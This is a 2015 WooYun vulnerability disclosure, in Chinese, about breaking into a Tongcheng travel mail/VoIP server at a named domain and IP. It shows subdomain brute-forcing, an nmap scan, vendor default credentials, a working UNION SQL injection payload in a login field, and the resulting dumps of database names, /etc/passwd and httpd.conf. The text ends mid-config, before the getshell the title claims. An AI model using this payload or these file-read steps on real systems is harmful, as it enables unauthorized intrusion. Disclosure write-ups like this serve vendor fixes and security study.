当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139924

漏洞标题:同程网某站Getshell已入内网(影响内部网络\信息安全)

相关厂商:苏州同程旅游网络科技有限公司

漏洞作者: if、so

提交时间:2015-09-09 13:27

修复时间:2015-10-24 13:30

公开时间:2015-10-24 13:30

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-09: 细节已通知厂商并且等待厂商处理中
2015-09-09: 厂商已经确认,细节仅向厂商公开
2015-09-19: 细节向核心白帽子及相关领域专家公开
2015-09-29: 细节向普通白帽子公开
2015-10-09: 细节向实习白帽子公开
2015-10-24: 细节向公众公开

简要描述:

整个过程一个字,累

详细说明:

这几天闲的蛋疼,便对同程网进行渗透测试。
对于渗透测试来说,信息收集非常重要,因为一般情况下,信息越少的目标越难搞定。
所以要想成功渗透目标,就需要大量信息。需要找到阴暗角落里的点,冷门域名加大域名字典可以搞定。
把目标放在了handhand.net这个目标,使用5万个域名字典进行爆破,最后得出了一个二级域名
mailserver.handhand.net
然后nmap扫描

8080/tcp on 222.92.145.58
Discovered open port 110/tcp on 222.92.145.58
Discovered open port 25/tcp on 222.92.145.58
Discovered open port 60480/tcp on 222.92.145.58
Discovered open port 51981/tcp on 222.92.145.58
Discovered open port 1433/tcp on 222.92.145.58
Discovered open port 54322/tcp on 222.92.145.58
Discovered open port 352/tcp on 222.92.145.58
Discovered open port 7000/tcp on 222.92.145.58
Discovered open port 803/tcp on 222.92.145.58
Discovered open port 409/tcp on 222.92.145.58
Discovered open port 7002/tcp on 222.92.145.58
Discovered open port 54321/


在7000和7002发现了mvb2000的系统

1111.png


发现都需要登陆 (basic auth),查看官方软件说明书,账号密码是

admin@mvb2000.localdomain 123456


发现都不能登陆
然后找到了几个不是basic auth的入口
http://mailserver.handhand.net:7002/recordings/index.php?logout=1
http://mailserver.handhand.net:7002/web-meetme/meetme_control.php
7000端口和上面一样
其中

http://mailserver.handhand.net:7002/web-meetme/meetme_control.php


存在登陆口union注入

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: AUTH_USER
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: current_page=0&AUTH_USER=111111' UNION ALL SELECT NULL,NULL,CONCAT(0x3a7361783a,0x5144477547536b654c6b,0x3a7579763a),NULL,NULL#&AUTH_PW=1111&bookId=&Login=%B5%C7%C2%BC
---
web server operating system: Linux CentOS 4.9
web application technology: PHP 4.3.9, Apache 2.0.52
back-end DBMS: MySQL 4
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: AUTH_USER
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: current_page=0&AUTH_USER=111111' UNION ALL SELECT NULL,NULL,CONCAT(0x3a7361783a,0x5144477547536b654c6b,0x3a7579763a),NULL,NULL#&AUTH_PW=1111&bookId=&Login=%B5%C7%C2%BC
---
web server operating system: Linux CentOS 4.9
web application technology: PHP 4.3.9, Apache 2.0.52
back-end DBMS: MySQL 4
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: AUTH_USER
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: current_page=0&AUTH_USER=111111' UNION ALL SELECT NULL,NULL,CONCAT(0x3a7361783a,0x5144477547536b654c6b,0x3a7579763a),NULL,NULL#&AUTH_PW=1111&bookId=&Login=%B5%C7%C2%BC
---
web server operating system: Linux CentOS 4.9
web application technology: PHP 4.3.9, Apache 2.0.52
back-end DBMS: MySQL 4
available databases [9]:
[*] c3crm
[*] conference
[*] mvb2000
[*] mvb2000cdrdb
[*] mvb2000csr
[*] mvb2000csr1200
[*] mvb2000extra
[*] mvb2000status
[*] postfix


权限比较大,可以读取文件

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ez-ipupd:x:100:101:Dynamic DNS Client:/var/cache/ez-ipupdate:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
exim:x:93:93::/var/spool/exim:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi-autoipd:x:101:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
asterisk:x:102:103:MVB2000 VoIP PBX:/var/lib/asterisk:/bin/bash
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
postfix:x:103:105::/var/spool/postfix:/bin/true
clr:x:500:500::/data:/sbin/nologin


既然可以读文件,就可以尝试读取htpasswd,但是发现不知道路径,而且htpasswd不一定在当前目录下,这个想法就放弃了
web系统使用的是centos,百度centos的apache的配置文件路径
发现配置文件路径是

/etc/httpd/conf/httpd.conf


web目录是

/var/www/html


尝试读取

/etc/httpd/conf/httpd.conf


成功读出来了

#
# Based upon the NCSA server configuration files originally by Rob McCool.
#
# This is the main Apache server configuration file. It contains the
# configuration directives that give the server its instructions.
# See <URL:http://httpd.apache.org/docs-2.0/> for detailed information about
# the directives.
#
# Do NOT simply read the instructions in here without understanding
# what they do. They're here only as hints or reminders. If you are unsure
# consult the online docs. You have been warned.
#
# The configuration directives are grouped into three basic sections:
# 1. Directives that control the operation of the Apache server process as a
# whole (the 'global environment').
# 2. Directives that define the parameters of the 'main' or 'default' server,
# which responds to requests that aren't handled by a virtual host.
# These directives also provide default values for the settings
# of all virtual hosts.
# 3. Settings for virtual hosts, which allow Web requests to be sent to
# different IP addresses or hostnames and have them handled by the
# same Apache server process.
#
# Configuration and logfile names: If the filenames you specify for many
# of the server's control files begin with "/" (or "drive:/" for Win32), the
# server will use that explicit path. If the filenames do *not* begin
# with "/", the value of ServerRoot is prepended -- so "logs/foo.log"
# with ServerRoot set to "/etc/httpd" will be interpreted by the
# server as "/etc/httpd/logs/foo.log".
#
### Section 1: Global Environment
#
# The directives in this section affect the overall operation of Apache,
# such as the number of concurrent requests it can handle or where it
# can find its configuration files.
#
#
# Don't give away too much information about all the subcomponents
# we are running. Comment out this line if you don't mind remote sites
# finding out what major optional modules you are running
ServerTokens OS
#
# ServerRoot: The top of the directory tree under which the server's
# configuration, error, and log files are kept.
#
# NOTE! If you intend to place this on an NFS (or otherwise network)
# mounted filesystem then please read the LockFile documentation
# (available at <URL:http://httpd.apache.org/docs-2.0/mod/core.html#lockfile>);
# you will save yourself a lot of trouble.
#
# Do NOT add a slash at the end of the directory path.
#
ServerRoot "/etc/httpd"
#
# ScoreBoardFile: File used to store internal server process information.
# If unspecified (the default), the scoreboard will be stored in an
# anonymous shared memory segment, and will be unavailable to third-party
# applications.
# If specified, ensure that no two invocations of Apache share the same
# scoreboard file. The scoreboard file MUST BE STORED ON A LOCAL DISK.
#
#ScoreBoardFile run/httpd.scoreboard
#
# PidFile: The file in which the server should record its process
# identification number when it starts.
#
PidFile run/httpd.pid
#
# Timeout: The number of seconds before receives and sends time out.
#
Timeout 60
#
# KeepAlive: Whether or not to allow persistent connections (more than
# one request per connection). Set to "Off" to deactivate.
#
KeepAlive Off
#
# MaxKeepAliveRequests: The maximum number of requests to allow
# during a persistent connection. Set to 0 to allow an unlimited amount.
# We recommend you leave this number high, for maximum performance.
#
MaxKeepAliveRequests 100
#
# KeepAliveTimeout: Number of seconds to wait for the next request from the
# same client on the same connection.
#
KeepAliveTimeout 15
##
## Server-Pool Size Regulation (MPM specific)
##
# prefork MPM
# StartServers: number of server processes to start
# MinSpareServers: minimum number of server processes which are kept spare
# MaxSpareServers: maximum number of server processes which are kept spare
# MaxClients: maximum number of server processes allowed to start
# MaxRequestsPerChild: maximum number of requests a server process serves
<IfModule prefork.c>
StartServers 8
MinSpareServers 5
MaxSpareServers 20
MaxClients 150
MaxRequestsPerChild 1000
</IfModule>
# worker MPM
# StartServers: initial number of server processes to start
# MaxClients: maximum number of simultaneous client connections
# MinSpareThreads: minimum number of worker threads which are kept spare
# MaxSpareThreads: maximum number of worker threads which are kept spare
# ThreadsPerChild: constant number of worker threads in each server process
# MaxRequestsPerChild: maximum number of requests a server process serves
<IfModule worker.c>
StartServers 2
MaxClients 150
MinSpareThreads 25
MaxSpareThreads 75
ThreadsPerChild 25
MaxRequestsPerChild 0
#
# To reduce memory usage in the worker MPM, the thread guard page
# can be disabled, at the expense of some protection against stack
# overflow.
#
#ThreadGuardArea off
</IfModule>
#
# Listen: Allows you to bind Apache to specific IP addresses and/or
# ports, in addition to the default. See also the <VirtualHost>
# directive.
#
# Change this to Listen on specific IP addresses as shown below to
# prevent Apache from glomming onto all bound IP addresses (0.0.0.0)
# e.g. "Listen 12.34.56.78:80"
#
# To allow connections to IPv6 addresses add "Listen [::]:80"
#
#
# Dynamic Shared Object (DSO) Support
#
# To be able to use the functionality of a module which was built as a DSO you
# have to place corresponding `LoadModule' lines at this location so the
# directives contained in it are actually available _before_ they are used.
# Statically compiled modules (those listed by `httpd -l') do not need
# to be loaded here.
#
# Example:
# LoadModule foo_module modules/mod_foo.so
#
LoadModule access_module modules/mod_access.so
LoadModule auth_module modules/mod_auth.so
LoadModule auth_anon_module modules/mod_auth_anon.so
LoadModule auth_dbm_module modules/mod_auth_dbm.so
LoadModule auth_digest_module modules/mod_auth_digest.so
LoadModule include_module modules/mod_include.so
LoadModule log_config_module modules/mod_log_config.so
LoadModule env_module modules/mod_env.so
LoadModule mime_magic_module modules/mod_mime_magic.so
LoadModule cern_meta_module modules/mod_cern_meta.so
LoadModule expires_module modules/mod_expires.so
LoadModule deflate_module modules/mod_deflate.so
LoadModule headers_module modules/mod_headers.so
LoadModule usertrack_module modules/mod_usertrack.so
LoadModule unique_id_module modules/mod_unique_id.so
LoadModule setenvif_module modules/mod_setenvif.so
LoadModule mime_module modules/mod_mime.so
LoadModule dav_module modules/mod_dav.so
LoadModule status_module modules/mod_status.so
LoadModule autoindex_module modules/mod_autoindex.so
LoadModule asis_module modules/mod_asis.so
LoadModule info_module modules/mod_info.so
LoadModule dav_fs_module modules/mod_dav_fs.so
LoadModule vhost_alias_module modules/mod_vhost_alias.so
LoadModule negotiation_module modules/mod_negotiation.so
LoadModule dir_module modules/mod_dir.so
LoadModule imap_module modules/mod_imap.so
LoadModule actions_module modules/mod_actions.so
LoadModule speling_module modules/mod_speling.so
LoadModule userdir_module modules/mod_userdir.so
LoadModule alias_module modules/mod_alias.so
LoadModule rewrite_module modules/mod_rewrite.so
LoadModule proxy_module modules/mod_proxy.so
LoadModule proxy_ftp_module modules/mod_proxy_ftp.so
LoadModule proxy_http_module modules/mod_proxy_http.so
LoadModule proxy_connect_module modules/mod_proxy_connect.so
LoadModule cache_module modules/mod_cache.so
LoadModule suexec_module modules/mod_suexec.so
LoadModule disk_cache_module modules/mod_disk_cache.so
LoadModule file_cache_module modules/mod_file_cache.so
LoadModule mem_cache_module modules/mod_mem_cache.so
LoadModule cgi_module modules/mod_cgi.so
#
# Load config files from the config directory "/etc/httpd/conf.d".
#
Include conf.d/*.conf
#
# ExtendedStatus controls whether Apache will generate "full" status
# information (ExtendedStatus On) or just basic information (ExtendedStatus
# Off) when the "server-status" handler is called. The default is Off.
#
#ExtendedStatus On
### Section 2: 'Main' server configuration
#
# The directives in this section set up the values used by the 'main'
# server, which responds to any requests that aren't handled by a
# <VirtualHost> definition. These values also provide defaults for
# any <VirtualHost> containers you may define later in the file.
#
# All of these directives may appear inside <VirtualHost> containers,
# in which case these default settings will be overridden for the
# virtual host being defined.
#
#
# If you wish httpd to run as a different user or group, you must run
# httpd as root initially and it will switch.
#
# User/Group: The name (or #number) of the user/group to run httpd as.
# . On SCO (ODT 3) use "User nouser" and "Group nogroup".
# . On HPUX you may not be able to use shared memory as nobody, and the
# suggested workaround is to create a user www and use that user.
# NOTE that some kernels refuse to setgid(Group) or semctl(IPC_SET)
# when the value of (unsigned)Group is above 60000;
# don't use Group #-1 on these systems!
#
User asterisk
Group asterisk
#
# ServerAdmin: Your address, where problems with the server should be
# e-mailed. This address appears on some server-generated pages, such
# as error documents. e.g. admin@your-domain.com
#
#ServerAdmin root@localhost
ServerAdmin admin@mvb2000.localdomain
#
# ServerName gives the name and port that the server uses to identify itself.
# This can often be determined automatically, but we recommend you specify
# it explicitly to prevent problems during startup.
#
# If this is not set to valid DNS name for your host, server-generated
# redirections will not work. See also the UseCanonicalName directive.
#
# If your host doesn't have a registered DNS name, enter its IP address here.
# You will have to access it by its address anyway, and this will make
# redirections work in a sensible way.
#
#ServerName new.host.name:80
#ServerName mvb2000.localdomain:80
#
# UseCanonicalName: Determines how Apache constructs self-referencing
# URLs and the SERVER_NAME and SERVER_PORT variables.
# When set "Off", Apache will use the Hostname and Port supplied
# by the client. When set "On", Apache will use the value of the
# ServerName directive.
#
UseCanonicalName Off
#
# DocumentRoot: The directory out of which you will serve your
# documents. By default, all requests are taken from this directory, but
# symbolic links and aliases may be used to point to other locations.
#
DocumentRoot "/var/www/html"
#
# Each directory to which Apache has access can be configured with respect
# to which services and features are allowed and/or disabled in that
# directory (and its subdirectories).
#
# First, we configure the "default" to be a very restrictive set of
# features.
#
<Directory />
Options FollowSymLinks
AllowOverride None
</Directory>
#
# Note that from this point forward you must specifically allow
# particular features to be enabled - so if something's not working as
# you might expect, make sure that you have specifically enabled it
# below.
#
#
# This should be changed to whatever you set DocumentRoot to.
#
<Directory "/var/www/html">
#
# Possible values for the Options directive are "None", "All",
# or any combination of:
# Indexes Includes FollowSymLinks SymLinksifOwnerMatch ExecCGI MultiViews
#
# Note that "MultiViews" must be named *explicitly* --- "Options All"
# doesn't give it to you.
#
# The Options directive is both complicated and important. Please see
# http://httpd.apache.org/docs-2.0/mod/core.html#options
# for more information.
#
Options
#
# AllowOverride controls what directives may be placed in .htaccess files.
# It can be "All", "None", or any combination of the keywords:
# Options FileInfo AuthConfig Limit
#
AllowOverride None
#
# Controls who can get stuff from this server.
#
Order allow,deny
Allow from all
</Directory>
#
# UserDir: The name of the directory that is appended onto a user's home
# directory if a ~user request is received.
#
# The path to the end user account 'public_html' directory must be
# accessible to the webserver userid. This usually means that ~userid
# must have permissions of 711, ~userid/public_html must have permissions
# of 755, and documents contained therein must be world-readable.
# Otherwise, the client will only receive a "403 Forbidden" message.
#
# See also: http://httpd.apache.org/docs/misc/FAQ.html#forbidden
#
<IfModule mod_userdir.c>
#
# UserDir is disabled by default since it can confirm the presence
# of a username on the system (depending on home directory
# permissions).
#
UserDir disable
#
# To enable requests to /~user/ to serve the user's public_html
# directory, remove the "UserDir disable" line above, and uncomment
# the following line instead:
#
#UserDir public_html
</IfModule>
#
# Control access to UserDir directories. The following is an example
# for a site where these directories are restricted to read-only.
#
#<Directory /home/*/public_html>
# AllowOverride FileInfo AuthConfig Limit
# Options MultiViews Indexes SymLinksIfOwnerMatch IncludesNoExec
# <Limit GET POST OPTIONS>
# Order allow,deny
# Allow from all
# </Limit>
# <LimitExcept GET POST OPTIONS>
# Order deny,allow
# Deny from all
# </LimitExcept>
#</Directory>
#
# DirectoryIndex: sets the file that Apache will serve if a directory
# is requested.
#
# The index.html.var file (a type-map) is used to deliver content-
# negotiated documents. The MultiViews Option can be used for the
# same purpose, but it is much slower.
#
DirectoryIndex index.html index.html.var index.php index.cgi
#
# AccessFileName: The name of the file to look for in each directory
# for additional configuration directives. See also the AllowOverride
# directive.
#
AccessFileName .htaccess
#
# The following lines prevent .htaccess and .htpasswd files from being
# viewed by Web clients.
#
<Files ~ "^\.ht">
Order allow,deny
Deny from all
</Files>
#
# TypesConfig describes where the mime.types file (or equivalent) is
# to be found.
#
TypesConfig /etc/mime.types
#
# DefaultType is the default MIME type the server will use for a document
# if it cannot otherwise determine one, such as from filename extensions.
# If your server contains mostly text or HTML documents, "text/plain" is
# a good value. If most of your content is binary, such as applications
# or images, you may want to use "application/octet-stream" instead to
# keep browsers from trying to display binary files as though they are
# text.
#
DefaultType text/plain
#
# The mod_mime_magic module allows the server to use various hints from the
# contents of the file itself to determine its type. The MIMEMagicFile
# directive tells the module where the hint definitions are located.
#
<IfModule mod_mime_magic.c>
# MIMEMagicFile /usr/share/magic.mime
MIMEMagicFile conf/magic
</IfModule>
#
# HostnameLookups: Log the names of clients or just their IP addresses
# e.g., www.apache.org (on) or 204.62.129.132 (off).
# The default is off because it'd be overall better for the net if people
# had to knowingly turn this feature on, since enabling it means that
# each client request will result in AT LEAST one lookup request to the
# nameserver.
#
HostnameLookups Off
#
# EnableMMAP: Control whether memory-mapping is used to deliver
# files (assuming that the underlying OS supports it).
# The default is on; turn this off if you serve from NFS-mounted
# filesystems. On some systems, turning it off (regardless of
# filesystem) can improve performance; for details, please see
# http://httpd.apache.org/docs-2.0/mod/core.html#enablemmap
#
#EnableMMAP off
#
# EnableSendfile: Control whether the sendfile kernel support is
# used to deliver files (assuming that the OS supports it).
# The default is on; turn this off if you serve from NFS-mounted
# filesystems. Please see
# http://httpd.apache.org/docs-2.0/mod/core.html#enablesendfile
#
#EnableSendfile off
#
#
# ErrorLog: The location of the error log file.
# If you do not specify an ErrorLog directive within a <VirtualHost>
# container, error messages relating to that virtual host will be
# logged here. If you *do* define an error logfile for a <VirtualHost>
# container, that host's errors will be logged there and not here.
#
#ErrorLog logs/error_log
#
# LogLevel: Control the number of messages logged to the error_log.
# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
#
LogLevel error
#
# The following directives define some format nicknames for use with
# a CustomLog directive (see below).
#
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %b" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent
#
# The location and format of the access logfile (Common Logfile Format).
# If you do not define any access logfiles within a <VirtualHost>
# container, they will be logged here. Contrariwise, if you *do*
# define per-<VirtualHost> access logfiles, transactions will be
# logged therein and *not* in this file.
#
#
# If you would like to have agent and referer logfiles, uncomment the
# following directives.
#
#CustomLog logs/referer_log referer
#CustomLog logs/agent_log agent
#
# If you prefer a single logfile with access, agent, and referer information
# (Combined Logfile Format) you can use the following directive.
#
#CustomLog logs/access_log combined
#
# Optionally add a line containing the server version and virtual host
# name to server-generated pages (error documents, FTP directory listings,
# mod_status and mod_info output etc., but not CGI generated documents).
# Set to "EMail" to also include a mailto: link to the ServerAdmin.
# Set to one of: On | Off | EMail
#
ServerSignature On
#
# Aliases: Add here as many aliases as you need (with no limit). The format is
# Alias fakename realname
#
# Note that if you include a trailing / on fakename then the server will
# require it to be present in the URL. So "/icons" isn't aliased in this
# example, only "/icons/". If the fakename is slash-terminated, then the
# realname must also be slash terminated, and if the fakename omits the
# trailing slash, the realname must also omit it.
#
#
# This should be changed to the ServerRoot/manual/. The alias provides
# the manual, even if you choose to move your DocumentRoot. You may comment
# this out if you do not care for the documentation.
#
#
# ScriptAlias: This controls which directories contain server scripts.
# ScriptAliases are essentially the same as Aliases, except that
# documents in the realname directory are treated as applications and
# run by the server when requested rather than as documents sent to the client.
# The same rules about trailing "/" apply to ScriptAlias directives as to
# Alias.
#
ScriptAlias /cgi-bin/ "/var/www/cgi-bin/"
#
# "/var/www/cgi-bin" should be changed to whatever your ScriptAliased
# CGI directory exists, if you have that configured.
#
<Directory "/var/www/cgi-bin">
AllowOverride None
Options None
Order allow,deny
Allow from all
</Directory>
#Password protect /var/www/html/mvb2000adv
<Directory /var/www/html/mvb2000adv>
AuthType Basic
AuthName "\?c7\?eb\?ca\?e4\?c8\?ebMVB2000\?b8߼\?b6\?b9\?dc\?c0\?edԱ\?d0\?c5Ϣ"
AuthUserFile /usr/local/apache/passwd/wwwpasswd
Require user mvb2000admin
</Directory>
#
# Redirect allows you to tell clients about documents which used to exist in
# your server's namespace, but do not anymore. This allows you to tell the
# clients where to look for the relocated document.
# Example:
# Redirect permanent /foo http://www.example.com/bar
#
# DefaultLanguage and AddLanguage allows you to specify the language of
# a document. You can then use content negotiation to give a browser a
# file in a language the user can understand.
#
# Specify a default language. This means that all data
# going out without a specific language tag (see below) will
# be marked with this one. You probably do NOT want to set
# this unless you are sure it is correct for all cases.
#
# * It is generally better to not mark a page as
# * being a certain language than marking it with the wrong
# * language!
#
# DefaultLanguage nl
#
# Note 1: The suffix does not have to be the same as the language
# keyword --- those with documents in Polish (whose net-standard
# language code is pl) may wish to use "AddLanguage pl .po" to
# avoid the ambiguity with the common suffix for perl scripts.
#
# Note 2: The example entries below illustrate that in some cases
# the two character 'Language' abbreviation is not identical to
# the two character 'Country' code for its country,
# E.g. 'Danmark/dk' versus 'Danish/da'.
#
# Note 3: In the case of 'ltz' we violate the RFC by using a three char
# specifier. There is 'work in progress' to fix this and get
# the reference data for rfc1766 cleaned up.
#
# Danish (da) - Dutch (nl) - English (en) - Estonian (et)
# French (fr) - German (de) - Greek-Modern (el)
# Italian (it) - Norwegian (no) - Norwegian Nynorsk (nn) - Korean (ko)
# Portugese (pt) - Luxembourgeois* (ltz)
# Spanish (es) - Swedish (sv) - Catalan (ca) - Czech(cs)
# Polish (pl) - Brazilian Portuguese (pt-br) - Japanese (ja)
# Russian (ru) - Croatian (hr)
#
AddLanguage en .en
AddLanguage zh-CN .zh-cn
AddLanguage zh-TW .zh-tw
#
# LanguagePriority allows you to give precedence to some languages
# in case of a tie during content negotiation.
#
# Just list the languages in decreasing order of preference. We have
# more or less alphabetized them here. You probably want to change this.
#
LanguagePriority en cn tw
#
# ForceLanguagePriority allows you to serve a result page rather than
# MULTIPLE CHOICES (Prefer) [in case of a tie] or NOT ACCEPTABLE (Fallback)
# [in case no accepted languages matched the available variants]
#
ForceLanguagePriority Prefer Fallback
#
# Specify a default charset for all pages sent out. This is
# always a good idea and opens the door for future internationalisation
# of your web site, should you ever want it. Specifying it as
# a default does little harm; as the standard dictates that a page
# is in iso-8859-1 (latin1) unless specified otherwise i.e. you
# are merely stating the obvious. There are also some security
# reasons in browsers, related to javascript and URL parsing
# which encourage you to always set a default char set.
#
#AddDefaultCharset UTF-8
AddDefaultCharset GB2312
#AddDefaultCharset Off
#
# Commonly used filename extensions to character sets. You probably
# want to avoid clashes with the language extensions, unless you
# are good at carefully testing your setup after each change.
# See http://www.iana.org/assignments/character-sets for the
# official list of charset names and their respective RFCs
#
AddCharset ISO-8859-1 .iso8859-1 .latin1
AddCharset ISO-8859-2 .iso8859-2 .latin2 .cen
AddCharset ISO-8859-3 .iso8859-3 .latin3
AddCharset ISO-8859-4 .iso8859-4 .latin4
AddCharset ISO-8859-5 .iso8859-5 .latin5 .cyr .iso-ru
AddCharset ISO-8859-6 .iso8859-6 .latin6 .arb
AddCharset ISO-8859-7 .iso8859-7 .latin7 .grk
AddCharset ISO-8859-8 .iso8859-8 .latin8 .heb
AddCharset ISO-8859-9 .iso8859-9 .latin9 .trk
AddCharset ISO-2022-JP .iso2022-jp .jis
AddCharset ISO-2022-KR .iso2022-kr .kis
AddCharset ISO-2022-CN .iso2022-cn .cis
AddCharset Big5 .Big5 .big5
# For russian, more than one charset is used (depends on client, mostly):
AddCharset WINDOWS-1251 .cp-1251 .win-1251
AddCharset CP866 .cp866
AddCharset KOI8-r .koi8-r .koi8-ru
AddCharset KOI8-ru .koi8-uk .ua
AddCharset ISO-10646-UCS-2 .ucs2
AddCharset ISO-10646-UCS-4 .ucs4
AddCharset UTF-8 .utf8
# The set below does not map to a specific (iso) standard
# but works on a fairly wide range of browsers. Note that
# capitalization actually matters (it should not, but it
# does for some browsers).
#
# See http://www.iana.org/assignments/character-sets
# for a list of sorts. But browsers support few.
#
AddCharset GB2312 .gb2312 .gb
AddCharset utf-7 .utf7
AddCharset utf-8 .utf8
AddCharset big5 .big5 .b5
AddCharset EUC-TW .euc-tw
AddCharset EUC-JP .euc-jp
AddCharset EUC-KR .euc-kr
AddCharset shift_jis .sjis
#
# AddType allows you to add to or override the MIME configuration
# file mime.types for specific file types.
#
AddType application/x-tar .tgz
#
# AddHandler allows you to map certain file extensions to "handlers":
# actions unrelated to filetype. These can be either built into the server
# or added with the Action directive (see below)
#
# To use CGI scripts outside of ScriptAliased directories:
# (You will also need to add "ExecCGI" to the "Options" directive.)
#
#AddHandler cgi-script .cgi
#
# For files that include their own HTTP headers:
#
#AddHandler send-as-is asis
#
# For server-parsed imagemap files:
#
AddHandler imap-file map
#
# For type maps (negotiated resources):
# (This is enabled by default to allow the Apache "It Worked" page
# to be distributed in multiple languages.)
#
AddHandler type-map var
# Filters allow you to process content before it is sent to the client.
#
# To parse .shtml files for server-side includes (SSI):
# (You will also need to add "Includes" to the "Options" directive.)
#
AddOutputFilter INCLUDES .shtml
#
# Action lets you define media types that will execute a script whenever
# a matching file is called. This eliminates the need for repeated URL
# pathnames for oft-used CGI file processors.
# Format: Action media/type /cgi-script/location
# Format: Action handler-name /cgi-script/location
#
#
# Customizable error responses come in three flavors:
# 1) plain text 2) local redirects 3) external redirects
#
# Some examples:
#ErrorDocument 500 "The server made a boo boo."
#ErrorDocument 404 /missing.html
#ErrorDocument 404 "/cgi-bin/missing_handler.pl"
#ErrorDocument 402 http://www.example.com/subscription_info.html
#
#
# Putting this all together, we can Internationalize error responses.
#
# We use Alias to redirect any /error/HTTP_<error>.html.var response to
# our collection of by-error message multi-language collections. We use
# includes to substitute the appropriate text.
#
# You can modify the messages' appearance without changing any of the
# default HTTP_<error>.html.var files by adding the line;
#
# Alias /error/include/ "/your/include/path/"
#
# which allows you to create your own set of files by starting with the
# /var/www/error/include/ files and
# copying them to /your/include/path/, even on a per-VirtualHost basis.
#
Alias /error/ "/var/www/error/"
<IfModule mod_negotiation.c>
<IfModule mod_include.c>
<Directory "/var/www/error">
AllowOverride None
Options IncludesNoExec
AddOutputFilter Includes html
AddHandler type-map var
Order allow,deny
Allow from all
LanguagePriority en es de fr
ForceLanguagePriority Prefer Fallback
</Directory>
# ErrorDocument 400 /error/HTTP_BAD_REQUEST.html.var
# ErrorDocument 401 /error/HTTP_UNAUTHORIZED.html.var
# ErrorDocument 403 /error/HTTP_FORBIDDEN.html.var
# ErrorDocument 404 /error/HTTP_NOT_FOUND.html.var
# ErrorDocument 405 /error/HTTP_METHOD_NOT_ALLOWED.html.var
# ErrorDocument 408 /error/HTTP_REQUEST_TIME_OUT.html.var
# ErrorDocument 410 /error/HTTP_GONE.html.var
# ErrorDocument 411 /error/HTTP_LENGTH_REQUIRED.html.var
# ErrorDocument 412 /error/HTTP_PRECONDITION_FAILED.html.var
# ErrorDocument 413 /error/HTTP_REQUEST_ENTITY_TOO_LARGE.html.var
# ErrorDocument 414 /error/HTTP_REQUEST_URI_TOO_LARGE.html.var
# ErrorDocument 415 /error/HTTP_SERVICE_UNAVAILABLE.html.var
# ErrorDocument 500 /error/HTTP_INTERNAL_SERVER_ERROR.html.var
# ErrorDocument 501 /error/HTTP_NOT_IMPLEMENTED.html.var
# ErrorDocument 502 /error/HTTP_BAD_GATEWAY.html.var
# ErrorDocument 503 /error/HTTP_SERVICE_UNAVAILABLE.html.var
# ErrorDocument 506 /error/HTTP_VARIANT_ALSO_VARIES.html.var
</IfModule>
</IfModule>
#
# The following directives modify normal HTTP response behavior to
# handle known problems with browser implementations.
#
BrowserMatch "Mozilla/2" nokeepalive
BrowserMatch "MSIE 4\.0b2;" nokeepalive downgrade-1.0 force-response-1.0
BrowserMatch "RealPlayer 4\.0" force-response-1.0
BrowserMatch "Java/1\.0" force-response-1.0
BrowserMatch "JDK/1\.0" force-response-1.0
#
# The following directive disables redirects on non-GET requests for
# a directory that does not include the trailing slash. This fixes a
# problem with Microsoft WebFolders which does not appropriately handle
# redirects for folders with DAV methods.
# Same deal with Apple's DAV filesystem and Gnome VFS support for DAV.
#
BrowserMatch "Microsoft Data Access Internet Publishing Provider" redirect-carefully
BrowserMatch "^WebDrive" redirect-carefully
BrowserMatch "^WebDAVFS/1.[012]" redirect-carefully
BrowserMatch "^gnome-vfs" redirect-carefully
#
# Allow server status reports, with the URL of http://servername/server-status
